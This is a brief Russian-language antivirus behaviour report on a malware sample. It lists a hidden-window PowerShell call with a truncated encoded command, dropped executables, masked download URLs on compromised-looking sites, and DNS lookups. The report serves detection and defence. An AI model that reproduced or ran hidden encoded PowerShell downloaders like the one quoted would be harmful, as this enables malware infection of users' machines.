Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABNAHIAdgBxAHYAZgBjAGUAaQBwAHMAbAA9ACcAWABmAHcAcgBwAGYAYwB5AGIAZQBpAG0AJwA7ACQAWAB6AHcAaABoAHAAaABnAHYAYgBmAHoAZQAgAD0AIAAnADMAMgAwACcAOwAkAFYAZgB3AGsAbgB6AG4AegB0AGsAcQB1AHYAPQA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\817070.cvr
- %HOMEPATH%\320.exe
- %HOMEPATH%\320.exe
- 'aq###avour.com':80
- 'it###ezle.com':80
- 'gu########plot.flywheelsites.com':443
- http://www.aq###avour.com/wp-includes/5u9/
- http://www.aq###avour.com/
- http://it###ezle.com/jhq5ds/zBA6DPHN/
- 'gu########plot.flywheelsites.com':443
- DNS ASK aq###avour.com
- DNS ASK it###ezle.com
- DNS ASK ri######arfoundation.org
- DNS ASK qu###washing.cl
- DNS ASK gu########plot.flywheelsites.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABNAHIAdgBxAHYAZgBjAGUAaQBwAHMAbAA9ACcAWABmAHcAcgBwAGYAYwB5AGIAZQBpAG0AJwA7ACQAWAB6AHcAaABoAHAAaABnAHYAYgBmAHoAZQAgAD0AIAAnADMAMgAwACcAOwAkAFYAZgB3AGsAbgB6AG4AegB0AGsAcQB1AHYAPQA...' (со скрытым окном)